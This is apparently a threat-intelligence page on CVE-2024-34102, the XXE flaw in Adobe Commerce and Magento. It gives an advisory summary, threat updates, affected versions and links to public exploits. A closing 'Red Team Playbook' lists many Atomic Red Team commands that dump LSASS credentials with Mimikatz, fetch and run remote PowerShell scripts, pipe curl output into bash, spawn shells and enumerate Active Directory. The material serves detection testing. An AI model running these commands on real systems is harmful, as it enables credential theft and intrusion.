CVE-2024-34102
Overview
This vulnerability is an Improper Restriction of XML External Entity (XXE) Reference affecting the XML parser within Adobe Commerce. The root cause lies in insufficient validation of XML input, allowing external entities to be referenced and processed. The affected component is the XML processing functionality in the REST API endpoint for guest cart shipping method estimation.
Vulnerability Description
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending a specially crafted XML payload to the guest cart shipping estimation API, resulting in arbitrary code execution on the server hosting Adobe Commerce. This allows full compromise of the affected system, including potential data exfiltration, system manipulation, and lateral movement within the network. No user interaction or valid credentials are required to exploit this flaw, increasing the attack surface significantly.
Solution
Adobe has released security updates addressing this vulnerability in Adobe Commerce versions 2.4.8 and later. Users should upgrade affected installations to the latest available patch as detailed in Adobe Security Bulletin APSB24-40. The advisory provides step-by-step instructions for patch application and mitigation. Refer to https://helpx.adobe.com/security/products/magento/apsb24-40.html for comprehensive remediation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Adobe Commerce and Magento platforms arises from an improper restriction of XML External Entity (XXE) references. This flaw allows an attacker to craft a malicious XML document that can reference external entities, potentially leading to arbitrary code execution on the server. The core issue lies in the way the XML parser processes external entities, which can be exploited if the application does not adequately validate or restrict the XML input. When the application parses the crafted XML, it may inadvertently execute commands or access sensitive files on the server, which could compromise the integrity and confidentiality of the system.
Attack vectors for this vulnerability are particularly concerning due to the lack of required user interaction for exploitation. An attacker could leverage this flaw by sending a specially crafted XML payload to the affected application, which would be processed without any user engagement. This could occur through various entry points, such as web forms, API endpoints, or even background processes that handle XML data. Once the malicious XML is processed, the attacker could gain access to sensitive information, execute arbitrary code, or manipulate the server environment, leading to a complete compromise of the affected system.
The real-world impact of this vulnerability can be significant, especially for businesses that rely on Adobe Commerce and Magento for their e-commerce operations. Successful exploitation could lead to unauthorized access to customer data, including payment information and personal details, resulting in severe reputational damage and financial loss. Furthermore, the potential for arbitrary code execution means that attackers could deploy malware, disrupt services, or use the compromised system as a launchpad for further attacks within the network. The high CVSS score of 9.8 indicates the critical nature of this vulnerability, emphasizing the urgent need for organizations to address it promptly.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to update to the latest versions of Adobe Commerce and Magento, as these updates typically include patches for known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious XML payloads before they reach the application. Regular security assessments and code reviews should also be conducted to identify and remediate potential weaknesses in XML parsing and handling. Furthermore, organizations should adopt secure coding practices, such as disabling external entity processing in XML parsers and validating all incoming XML data against a strict schema.
In conclusion, the improper restriction of XML External Entity references in Adobe Commerce and Magento poses a serious threat to organizations utilizing these platforms. The ease of exploitation and the potential for significant impact necessitate immediate action to mitigate risks. By staying informed about vulnerabilities, implementing robust security measures, and fostering a culture of security awareness, organizations can better protect themselves against such critical threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-34102, with telemetry indicating a doubling in exploitation attempts. This uptick coincides with the recent addition of the vulnerability to the Known Exploited Vulnerabilities (KEV) catalog, underscoring increased adversary focus. Although the EPSS score remains high and stable, the surge in detection signals growing exploitation interest, likely driven by the availability of multiple new proof-of-concept exploits on public repositories. Notably, no confirmed ransomware campaigns have been linked to this vulnerability, and associated threat groups remain limited in number. However, the expanding exploit landscape and heightened detection frequency elevate the threat level, emphasizing the criticality of vigilant monitoring and rapid incident response for organizations running affected Adobe Commerce versions.
Update 2 — May 16, 2026
CSURFACE threat intelligence has identified a modest but meaningful uptick in exploitation attempts targeting CVE-2024-34102, coinciding with the recent emergence of additional proof-of-concept exploits on public platforms. This subtle increase in detection signals suggests that adversaries are actively experimenting with or refining attack methodologies against vulnerable Adobe Commerce instances. While the EPSS score remains near its peak, the slight upward trend in telemetry underscores a growing attacker interest that could presage more widespread exploitation. Importantly, no new ransomware affiliations have been detected, and the threat actor landscape remains limited, indicating that this vulnerability is primarily leveraged for initial access or reconnaissance rather than direct ransomware deployment at this stage. For defenders, this evolving activity highlights the necessity for heightened vigilance and continuous monitoring, as the expanding exploit toolkit lowers the barrier for opportunistic attackers. Consequently, the overall threat level should be considered elevated, reflecting increased exploitation attempts and the potential for rapid escalation if threat actors integrate these exploits into broader campaigns.
Update 3 — June 23, 2026
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2024-34102, accompanied by the emergence of several new proof-of-concept tools that have gained traction within the attacker community. Our telemetry indicates that the EPSS score for this vulnerability has approached its maximum, reflecting a near-certain likelihood of exploitation in the wild. This escalation is significant because it lowers the technical barrier for threat actors, enabling a broader range of adversaries—including less sophisticated operators—to leverage the vulnerability for initial access or lateral movement. Although ransomware groups have not yet demonstrated high-confidence associations with this exploit, the increased activity and expanded exploit toolkit elevate the risk of integration into more complex attack chains. Consequently, the threat level for Adobe Commerce environments should be considered elevated, warranting heightened monitoring and proactive detection efforts to address the growing exploitation landscape.
Update 4 — July 09, 2026
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2024-34102, reflected by increased detection activity across our sensors. This uptick coincides with the continued availability and diversification of publicly accessible proof-of-concept exploits, which lowers the technical barrier for adversaries to weaponize this critical XXE vulnerability in Adobe Commerce. Although ransomware groups have yet to establish high-confidence operational use of this exploit, the expanding exploit toolkit and rising attack volume suggest a growing likelihood of integration into broader attack campaigns. Consequently, the threat landscape for affected Adobe Commerce environments has intensified, underscoring the urgency for defenders to enhance monitoring and detection capabilities to address this evolving risk.
Affected Products (59)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Adobe | Commerce | 2.4.2 |
cpe:2.3:a:adobe:commerce:2.4.2:-:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.2 |
cpe:2.3:a:adobe:commerce:2.4.2:ext-1:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.2 |
cpe:2.3:a:adobe:commerce:2.4.2:ext-2:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.2 |
cpe:2.3:a:adobe:commerce:2.4.2:ext-3:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.2 |
cpe:2.3:a:adobe:commerce:2.4.2:ext-4:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.2 |
cpe:2.3:a:adobe:commerce:2.4.2:ext-7:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.3 |
cpe:2.3:a:adobe:commerce:2.4.3:-:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.3 |
cpe:2.3:a:adobe:commerce:2.4.3:ext-1:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.3 |
cpe:2.3:a:adobe:commerce:2.4.3:ext-2:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.3 |
cpe:2.3:a:adobe:commerce:2.4.3:ext-3:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.3 |
cpe:2.3:a:adobe:commerce:2.4.3:ext-4:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.3 |
cpe:2.3:a:adobe:commerce:2.4.3:ext-7:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Magento XXE Unserialize Arbitrary File Read
auxiliary/gather/magento_xxe_cve_2024_34102
|
Sergey Temnikov, Heyder | Unknown | - | View |
|
CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() function of glibc (CVE-2024-2961)
exploits/linux/http/magento_xxe_to_glibc_buf_overflow
|
Sergey Temnikov, Charles Fol, Heyder +1 | Unknown | - | View |
GitHub PoCs (25)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2024-34102
CosmicSting (CVE-2024-34102)
|
Chocapikk | 48 | 9 | 2024-06-28 | View |
|
bigb0x/CVE-2024-34102
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.
|
bigb0x | 31 | 13 | 2024-06-27 | View |
|
th3gokul/CVE-2024-34102
CVE-2024-34102: Unauthenticated Magento XXE
|
th3gokul | 14 | 1 | 2024-06-27 | View |
|
jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento
CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)
|
jakabakos | 9 | 1 | 2024-07-01 | View |
|
bughuntar/CVE-2024-34102
Exploitation CVE-2024-34102
|
bughuntar | 5 | 2 | 2024-07-13 | View |
|
EQSTLab/CVE-2024-34102
Adobe Commerce XXE exploit
|
EQSTLab | 4 | 0 | 2024-08-13 | View |
|
11whoami99/CVE-2024-34102
POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook
|
11whoami99 | 3 | 0 | 2024-06-28 | View |
|
0x0d3ad/CVE-2024-34102
CVE-2024-34102 (Magento XXE)
|
0x0d3ad | 2 | 0 | 2024-06-30 | View |
|
d0rb/CVE-2024-34102
A PoC demonstration , critical XML entity injection vulnerability in Magento
|
d0rb | 0 | 2 | 2024-06-28 | View |
|
Phantom-IN/CVE-2024-34102
|
Phantom-IN | 1 | 0 | 2024-07-14 | View |
|
wubinworks/magento2-encryption-key-manager-cli
A utility for Magento 2 encryption key rotation and management. CVE-2024-34102(aka Cosmic Sting) victims can use it as a...
|
wubinworks | 0 | 1 | 2024-12-04 | View |
|
nmmorette/CVE-2024-34102
CVE-2024-34102 exploit for python3
|
nmmorette | 1 | 0 | 2026-02-13 | View |
|
wubinworks/magento2-cosmic-sting-patch
An alternative solution(as a Magento 2 extension) to fix the XXE vulnerability CVE-2024-34102(aka Cosmic Sting). If you ...
|
wubinworks | 1 | 0 | 2024-08-08 | View |
|
russellwork2021-lgtm/cosmicsting-cve-2024-34102-exploit
Complete CosmicSting (CVE-2024-34102) exploit suite for Magento/Adobe Commerce XXE vulnerability
|
russellwork2021-lgtm | 0 | 0 | 2026-05-25 | View |
|
ArturArz1/TestCVE-2024-34102
|
ArturArz1 | 0 | 0 | 2024-06-27 | View |
|
cmsec423/Magento-XXE-CVE-2024-34102
|
cmsec423 | 0 | 0 | 2024-07-01 | View |
|
SamJUK/cosmicsting-validator
CosmicSting (CVE-2024-34102) POC / Patch Validator
|
SamJUK | 0 | 0 | 2024-07-07 | View |
|
crynomore/CVE-2024-34102
Burp Extension to test for CVE-2024-34102
|
crynomore | 0 | 0 | 2024-07-11 | View |
|
dream434/CVE-2024-34102
adobe commerce
|
dream434 | 0 | 0 | 2024-08-19 | View |
|
bka/magento-cve-2024-34102-exploit-cosmicstring
|
bka | 0 | 0 | 2024-10-08 | View |
|
unknownzerobit/poc
poc for CVE-2024-34102
|
unknownzerobit | 0 | 0 | 2024-07-08 | View |
|
cmsec423/CVE-2024-34102
Magento XXE
|
cmsec423 | 0 | 0 | 2024-07-01 | View |
|
Kento-Sec/CVE-2024-34102
|
Kento-Sec | 0 | 0 | 2025-08-14 | View |
|
Koray123-debug/CVE-2024-34102
|
Koray123-debug | 0 | 0 | 2025-04-06 | View |
|
mksundaram69/CVE-2024-34102
|
mksundaram69 | 0 | 0 | 2025-01-07 | View |
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-221 | Data Serialization External Entities Blowup |
40%
|
— | — |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
